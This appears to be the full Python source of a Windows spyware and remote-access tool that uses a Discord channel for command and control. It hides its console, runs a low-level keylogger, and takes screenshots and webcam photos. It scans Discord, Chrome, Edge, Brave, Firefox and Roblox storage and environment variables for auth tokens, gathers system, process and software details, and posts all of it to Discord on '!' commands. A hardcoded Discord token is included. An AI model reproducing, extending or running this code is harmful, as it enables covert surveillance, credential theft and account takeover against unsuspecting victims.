import os
import sys
import time
import base64
import requests
import subprocess
import threading
import cv2
import numpy as np
from PIL import ImageGrab
import io
import socket
import getpass
import platform
import json
import tempfile
import shutil
import ctypes
import traceback
import re
from datetime import datetime, timezone

USER_TOKEN = "MTUxOTQzMTUwMzg3NTAxODc2Mg.GysnGz.-HuDJFP55GocWthqs4Vu0lCQHnBEpnRRsLeTxw"
SERVER_ID = "1520234960642900090"
CHANNEL_ID = "1520234961490411522"
CLIENT_ID = "1519431503875018762"
running = True

STARTUP_FLAG_FILE = os.path.join(tempfile.gettempdir(), "Python_started.lock")
if os.path.exists(STARTUP_FLAG_FILE):
    sys.exit(0)
else:
    with open(STARTUP_FLAG_FILE, 'w') as f:
        f.write(str(os.getpid()))

def send_debug(message):
    try:
        headers = {"Authorization": USER_TOKEN, "Content-Type": "application/json"}
        payload = {"content": f"**[DEBUG]** {message}"}
        requests.post(f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages", headers=headers, json=payload, timeout=5)
    except:
        pass

def send_error(message):
    try:
        headers = {"Authorization": USER_TOKEN, "Content-Type": "application/json"}
        payload = {"content": f"**[ERROR]** {message}"}
        requests.post(f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages", headers=headers, json=payload, timeout=5)
    except:
        pass

def install_missing_modules():
    required_modules = {'cv2': 'opencv-python', 'PIL': 'Pillow', 'requests': 'requests', 'numpy': 'numpy'}
    for module_name, pip_name in required_modules.items():
        try:
            __import__(module_name)
        except ImportError:
            try:
                subprocess.check_call([sys.executable, "-m", "pip", "install", pip_name, "--quiet", "--disable-pip-version-check"])
            except:
                pass

install_missing_modules()
import cv2
import numpy as np
from PIL import ImageGrab

send_debug("Startup script initialized successfully")

class WindowsKeylogger:
    def __init__(self):
        self.buffer = []
        self.lock = threading.Lock()
        self.running = True
        self.hook_id = None
        self.user32 = ctypes.windll.user32
        self.kernel32 = ctypes.windll.kernel32
        self.WM_KEYDOWN = 0x0100
        self.WM_SYSKEYDOWN = 0x0104
        self.WH_KEYBOARD_LL = 13
        self.key_map = {
            0x08: '[BACKSPACE]', 0x09: '[TAB]', 0x0D: '\\n', 0x10: '[SHIFT]',
            0x11: '[CTRL]', 0x12: '[ALT]', 0x14: '[CAPSLOCK]', 0x1B: '[ESC]',
            0x20: ' ', 0x21: '[PGUP]', 0x22: '[PGDN]', 0x23: '[END]',
            0x24: '[HOME]', 0x25: '[LEFT]', 0x26: '[UP]', 0x27: '[RIGHT]',
            0x28: '[DOWN]', 0x2D: '[INSERT]', 0x2E: '[DELETE]', 0x5B: '[WIN]',
            0x5C: '[WIN]', 0x70: '[F1]', 0x71: '[F2]', 0x72: '[F3]',
            0x73: '[F4]', 0x74: '[F5]', 0x75: '[F6]', 0x76: '[F7]',
            0x77: '[F8]', 0x78: '[F9]', 0x79: '[F10]', 0x7A: '[F11]',
            0x7B: '[F12]', 0x90: '[NUMLOCK]', 0x91: '[SCROLLLOCK]',
            0xA0: '[LSHIFT]', 0xA1: '[RSHIFT]', 0xA2: '[LCTRL]', 0xA3: '[RCTRL]',
            0xA4: '[LALT]', 0xA5: '[RALT]'
        }
        self.shift_map = {
            '1': '!', '2': '@', '3': '#', '4': '$$', '5': '%',
            '6': '^', '7': '&', '8': '*', '9': '(', '0': ')',
            '-': '_', '=': '+', '[': '{', ']': '}', '\\\\': '|',
            ';': ':', "'": '"', ',': '<', '.': '>', '/': '?',
            '`': '~'
        }
        self.caps_lock = False
        self.shift_pressed = False
        self.HOOKPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_void_p))
        self.hook_proc = self.HOOKPROC(self.hook_callback)

    def get_ascii_char(self, vk_code, scan_code, flags):
        state = (ctypes.c_ubyte * 256)()
        self.user32.GetKeyboardState(ctypes.byref(state))
        wchar = (ctypes.c_wchar * 2)()
        result = self.user32.ToUnicode(vk_code, scan_code, state, wchar, 1, flags)
        if result > 0:
            char = wchar[0]
            if self.shift_pressed and char in self.shift_map:
                return self.shift_map[char]
            return char
        return None

    def hook_callback(self, nCode, wParam, lParam):
        try:
            if nCode >= 0:
                if wParam == self.WM_KEYDOWN or wParam == self.WM_SYSKEYDOWN:
                    vk_code = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 0) & 0xFF
                    scan_code = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 16) & 0xFF
                    flags = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 24) & 0xFF
                    if vk_code == 0x10:
                        self.shift_pressed = True
                    elif vk_code == 0x14:
                        self.caps_lock = not self.caps_lock
                    char = self.get_ascii_char(vk_code, scan_code, flags)
                    if char is not None and char != '':
                        with self.lock:
                            self.buffer.append(char)
                            if len(self.buffer) > 5000:
                                self.buffer = self.buffer[-4000:]
                    elif vk_code in self.key_map:
                        with self.lock:
                            self.buffer.append(self.key_map[vk_code])
                            if len(self.buffer) > 5000:
                                self.buffer = self.buffer[-4000:]
        except:
            pass
        return self.user32.CallNextHookEx(self.hook_id, nCode, wParam, lParam)

    def start(self):
        try:
            self.hook_id = self.user32.SetWindowsHookExW(
                self.WH_KEYBOARD_LL,
                self.hook_proc,
                self.kernel32.GetModuleHandleW(None),
                0
            )
            if self.hook_id:
                msg = ctypes.wintypes.MSG()
                while self.running:
                    ret = self.user32.GetMessageW(ctypes.byref(msg), None, 0, 0)
                    if ret == -1:
                        break
                    self.user32.TranslateMessage(ctypes.byref(msg))
                    self.user32.DispatchMessageW(ctypes.byref(msg))
        except:
            pass

    def get_buffer(self):
        with self.lock:
            if self.buffer:
                data = ''.join(self.buffer)
                self.buffer.clear()
                return data
            return None

def hide_console():
    try:
        if platform.system() == "Windows":
            ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
    except:
        pass

def take_screenshot():
    try:
        screenshot = ImageGrab.grab()
        img_bytes = io.BytesIO()
        screenshot.save(img_bytes, format='JPEG', quality=70)
        return base64.b64encode(img_bytes.getvalue()).decode('utf-8')
    except Exception as e:
        send_error(f"Screenshot capture failed: {str(e)}")
        return None

def take_camera_photo():
    try:
        cap = cv2.VideoCapture(0)
        cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
        cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
        ret, frame = cap.read()
        if ret:
            _, img_encoded = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 70])
            cap.release()
            return base64.b64encode(img_encoded.tobytes()).decode('utf-8')
        cap.release()
        return None
    except Exception as e:
        send_error(f"Camera capture failed: {str(e)}")
        return None

def send_discord_message(content, file_bytes=None, filename=None):
    try:
        headers = {"Authorization": USER_TOKEN}
        if file_bytes:
            files = {'file': (filename, file_bytes, 'image/jpeg')}
            data = {'content': content}
            response = requests.post(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers=headers,
                data=data,
                files=files,
                timeout=30
            )
            if response.status_code == 200:
                return True
            else:
                send_error(f"Send failed: {response.status_code}")
                return False
        else:
            response = requests.post(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers=headers,
                json={"content": content},
                timeout=10
            )
            if response.status_code == 200:
                return True
            else:
                send_error(f"Send failed: {response.status_code}")
                return False
    except Exception as e:
        send_error(f"Send error: {str(e)}")
        return False

def search_tokens():
    """Search for tokens in common locations"""
    tokens = []
    
    # Token patterns
    patterns = [
        r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}',
        r'mfa\\.[\\w-]{84}',
        r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{38}',
        r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}',
        r'[\\w-]{20,30}\\.[\\w-]{6}\\.[\\w-]{27,40}',
    ]
    
    # Search paths (Discord, Chrome, Edge, Brave, Roblox, Firefox, system)
    appdata = os.environ.get("APPDATA", "")
    localappdata = os.environ.get("LOCALAPPDATA", "")
    
    search_paths = []
    search_paths.extend([
        os.path.join(appdata, "discord", "Local Storage", "leveldb"),
        os.path.join(appdata, "discordcanary", "Local Storage", "leveldb"),
        os.path.join(appdata, "discordptb", "Local Storage", "leveldb"),
        os.path.join(localappdata, "Discord", "Local Storage", "leveldb"),
        os.path.join(localappdata, "discord", "Local Storage", "leveldb"),
        os.path.join(localappdata, "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb"),
        os.path.join(localappdata, "Google", "Chrome", "User Data", "Default", "Cookies"),
        os.path.join(localappdata, "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb"),
        os.path.join(localappdata, "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb"),
        os.path.join(appdata, "Roblox", "Local Storage", "leveldb"),
        os.path.join(localappdata, "Roblox", "Local Storage", "leveldb"),
        os.path.join(os.path.expanduser("~"), "AppData", "Local", "Roblox", "Local Storage", "leveldb"),
        tempfile.gettempdir(),
        os.path.expanduser("~"),
        os.path.expanduser("~/Desktop"),
        os.path.expanduser("~/Documents"),
        os.path.expanduser("~/Downloads"),
    ])
    
    # Firefox profiles
    firefox_profiles = os.path.join(appdata, "Mozilla", "Firefox", "Profiles")
    if os.path.exists(firefox_profiles):
        for profile in os.listdir(firefox_profiles):
            if profile.endswith('.default') or profile.endswith('.default-release'):
                search_paths.append(os.path.join(firefox_profiles, profile, "webappsstore.sqlite"))
                search_paths.append(os.path.join(firefox_profiles, profile, "cookies.sqlite"))
    
    for path in search_paths:
        if not os.path.exists(path):
            continue
        try:
            if os.path.isfile(path):
                with open(path, 'r', errors='ignore') as f:
                    content = f.read(50000)
                    for pattern in patterns:
                        matches = re.findall(pattern, content)
                        for match in matches:
                            if match not in tokens:
                                tokens.append(match)
                                send_debug(f"Found token in file: {path}")
            elif os.path.isdir(path):
                for root, dirs, files in os.walk(path):
                    if len(tokens) > 20:
                        break
                    for file in files:
                        if len(tokens) > 20:
                            break
                        if file.endswith(('.log', '.ldb', '.txt', '.sqlite', '.db')):
                            file_path = os.path.join(root, file)
                            try:
                                with open(file_path, 'r', errors='ignore') as f:
                                    content = f.read(50000)
                                    for pattern in patterns:
                                        matches = re.findall(pattern, content)
                                        for match in matches:
                                            if match not in tokens:
                                                tokens.append(match)
                                                send_debug(f"Found token in file: {file_path}")
                            except:
                                pass
        except:
            pass
    
    # Check environment variables
    for key, value in os.environ.items():
        for pattern in patterns:
            matches = re.findall(pattern, value)
            for match in matches:
                if match not in tokens:
                    tokens.append(match)
                    send_debug(f"Found token in environment variable: {key}")
    
    return tokens

def get_full_system_report():
    data = {}
    try:
        data["system"] = {"computer_name": socket.gethostname(), "username": getpass.getuser(), "os": platform.system() + " " + platform.release(), "os_version": platform.version(), "architecture": platform.machine(), "processor": platform.processor(), "cpu_count": os.cpu_count(), "timestamp": datetime.now(timezone.utc).isoformat()}
        data["network"] = {"ip": socket.gethostbyname(socket.gethostname()), "external_ip": requests.get("https://api.ipify.org", timeout=3).text if requests else "N/A"}
        drives = []
        if platform.system() == "Windows":
            for letter in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
                drive = f"{letter}:\\\\"
                if os.path.exists(drive):
                    try:
                        usage = shutil.disk_usage(drive)
                        drives.append({"drive": drive, "total_gb": round(usage.total / (1024**3), 2), "used_gb": round(usage.used / (1024**3), 2), "free_gb": round(usage.free / (1024**3), 2), "percent_used": round((usage.used / usage.total) * 100, 1)})
                    except:
                        pass
        data["drives"] = drives
        downloads_path = os.path.expanduser("~/Downloads")
        downloads = []
        if os.path.exists(downloads_path):
            try:
                for item in os.listdir(downloads_path)[:50]:
                    item_path = os.path.join(downloads_path, item)
                    if os.path.isfile(item_path):
                        downloads.append({"name": item, "size": os.path.getsize(item_path), "modified": datetime.fromtimestamp(os.path.getmtime(item_path)).isoformat()})
            except:
                pass
        data["downloads"] = downloads
        data["tokens_found"] = search_tokens()
        processes = []
        try:
            if platform.system() == "Windows":
                output = subprocess.check_output(["tasklist", "/FO", "CSV", "/V"], stderr=subprocess.DEVNULL).decode()
                for line in output.splitlines()[1:30]:
                    parts = line.split(',')
                    if len(parts) >= 8:
                        processes.append({"name": parts[0].strip('"'), "pid": parts[1].strip('"'), "memory_mb": parts[4].strip('"'), "user": parts[6].strip('"')})
        except:
            pass
        data["processes"] = processes
        software = []
        try:
            if platform.system() == "Windows":
                import winreg
                keys = [(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"), (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall")]
                for hkey, key in keys:
                    try:
                        with winreg.OpenKey(hkey, key) as reg_key:
                            index = 0
                            while True:
                                try:
                                    subkey_name = winreg.EnumKey(reg_key, index)
                                    with winreg.OpenKey(reg_key, subkey_name) as subkey:
                                        try:
                                            name = winreg.QueryValueEx(subkey, "DisplayName")[0]
                                            version = winreg.QueryValueEx(subkey, "DisplayVersion")[0] if "DisplayVersion" in [winreg.EnumValue(subkey, i)[0] for i in range(winreg.QueryInfoKey(subkey)[1])] else "N/A"
                                            if name:
                                                software.append({"name": name, "version": version})
                                        except:
                                            pass
                                    index += 1
                                except WindowsError:
                                    break
                    except:
                        pass
        except:
            pass
        data["installed_software"] = software[:50]
    except Exception as e:
        send_error(f"System report failed: {str(e)}")
    return data

def process_command(command, content):
    try:
        if command == "screenshot":
            send_discord_message("Taking screenshot...")
            screenshot = take_screenshot()
            if screenshot:
                img_data = base64.b64decode(screenshot)
                send_discord_message("Screenshot taken:", img_data, "screenshot.jpg")
                send_debug("Screenshot sent")
            else:
                send_discord_message("Failed to take screenshot")
        
        elif command == "camera":
            send_discord_message("Taking camera photo...")
            camera = take_camera_photo()
            if camera:
                img_data = base64.b64decode(camera)
                send_discord_message("Camera photo taken:", img_data, "camera.jpg")
                send_debug("Camera photo sent")
            else:
                send_discord_message("Failed to take camera photo")
        
        elif command == "system":
            data = get_full_system_report()
            summary = f"=== SYSTEM REPORT ===\\nComputer: {data['system']['computer_name']}\\nUser: {data['system']['username']}\\nOS: {data['system']['os']}\\nArchitecture: {data['system']['architecture']}\\nCPU: {data['system']['processor']}\\nCPU Cores: {data['system']['cpu_count']}\\nIP: {data['network']['ip']}\\nExternal IP: {data['network']['external_ip']}\\nDrives: {len(data.get('drives', []))}\\nDownloads: {len(data.get('downloads', []))}\\nProcesses: {len(data.get('processes', []))}\\nInstalled Software: {len(data.get('installed_software', []))}\\nTokens Found: {len(data.get('tokens_found', []))}"
            send_discord_message(f"```\\n{summary}\\n```")
        
        elif command == "tokens":
            send_debug("Searching for tokens...")
            tokens = search_tokens()
            if tokens:
                token_list = "\\n".join([f"- {t}" for t in tokens[:20]])
                send_discord_message(f"**Tokens Found:**\\n```\\n{token_list}\\n```")
                send_debug(f"Found {len(tokens)} tokens")
            else:
                send_discord_message("No tokens found")
                send_debug("No tokens found")
        
        elif command == "downloads":
            data = get_full_system_report()
            if data.get("downloads"):
                dl_list = "\\n".join([f"- {d['name']} ({d['size']} bytes)" for d in data["downloads"][:20]])
                send_discord_message(f"Downloads:\\n```\\n{dl_list}\\n```")
            else:
                send_discord_message("No downloads found")
        
        elif command == "processes":
            data = get_full_system_report()
            if data.get("processes"):
                proc_list = "\\n".join([f"- {p['name']} (PID: {p['pid']}) - {p.get('memory_mb', 'N/A')}" for p in data["processes"][:20]])
                send_discord_message(f"Running processes:\\n```\\n{proc_list}\\n```")
            else:
                send_discord_message("No processes found")
        
        elif command == "keylog":
            keys = keylogger.get_buffer() if 'keylogger' in globals() else None
            if keys:
                send_discord_message(f"Keylog:\\n```\\n{keys[-2000:]}\\n```")
            else:
                send_discord_message("No keys logged yet")
        
        elif command == "help":
            help_text = "**Available Commands:**\\n!screenshot - Take a screenshot\\n!camera - Take camera photo\\n!system - Show system info\\n!tokens - Search for Discord/Roblox tokens\\n!downloads - Show downloads folder\\n!processes - Show running processes\\n!keylog - Show recent keystrokes\\n!help - Show this message\\n!stop - Stop the bot"
            send_discord_message(help_text)
        
        elif command == "stop":
            send_discord_message("Stopping bot...")
            global running
            running = False
        
        return True
    except Exception as e:
        send_error(f"Command {command} failed: {str(e)}\\n{traceback.format_exc()}")
        return False

def command_handler():
    global running
    last_message_id = None
    
    send_debug("Command handler started, listening for commands...")
    send_discord_message(f"Bot started on {socket.gethostname()}\\nType !help for commands")
    
    while running:
        try:
            headers = {"Authorization": USER_TOKEN}
            params = {"limit": 5}
            if last_message_id:
                params["after"] = last_message_id
            
            response = requests.get(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers=headers,
                params=params,
                timeout=10
            )
            
            if response.status_code == 200:
                messages = response.json()
                for msg in messages:
                    if msg["author"]["id"] == CLIENT_ID:
                        continue
                    content = msg.get("content", "").strip()
                    if not content:
                        continue
                    if not last_message_id or msg["id"] > last_message_id:
                        last_message_id = msg["id"]
                    if content.startswith("!"):
                        command = content[1:].lower()
                        send_debug(f"Command received: !{command}")
                        process_command(command, content)
            elif response.status_code == 429:
                retry_after = response.json().get("retry_after", 1)
                send_debug(f"Rate limited! Waiting {retry_after}s")
                time.sleep(retry_after + 0.5)
            else:
                send_debug(f"HTTP Error: {response.status_code}")
                time.sleep(1)
        except Exception as e:
            send_error(f"Command handler error: {str(e)}")
            time.sleep(2)
        time.sleep(0.5)

def keylog_loop():
    global keylogger
    send_debug("Starting keylogger...")
    keylogger = WindowsKeylogger()
    threading.Thread(target=keylogger.start, daemon=True).start()
    send_debug("Keylogger started successfully")
    while running:
        time.sleep(60)
        try:
            keys = keylogger.get_buffer()
            if keys:
                send_debug(f"Keylog report: {len(keys)} characters logged")
                send_discord_message(f"Keylog Report:\\n```\\n{keys[-1900:]}\\n```")
        except:
            pass

def main():
    global CHANNEL_ID
    hide_console()
    send_debug("Startup script main() called")
    if not CHANNEL_ID:
        send_debug("ERROR: No channel ID configured!")
        return
    send_debug(f"Channel ID: {CHANNEL_ID}")
    send_debug("Bot started successfully")
    threading.Thread(target=keylog_loop, daemon=True).start()
    command_handler()

if __name__ == "__main__":
    main()
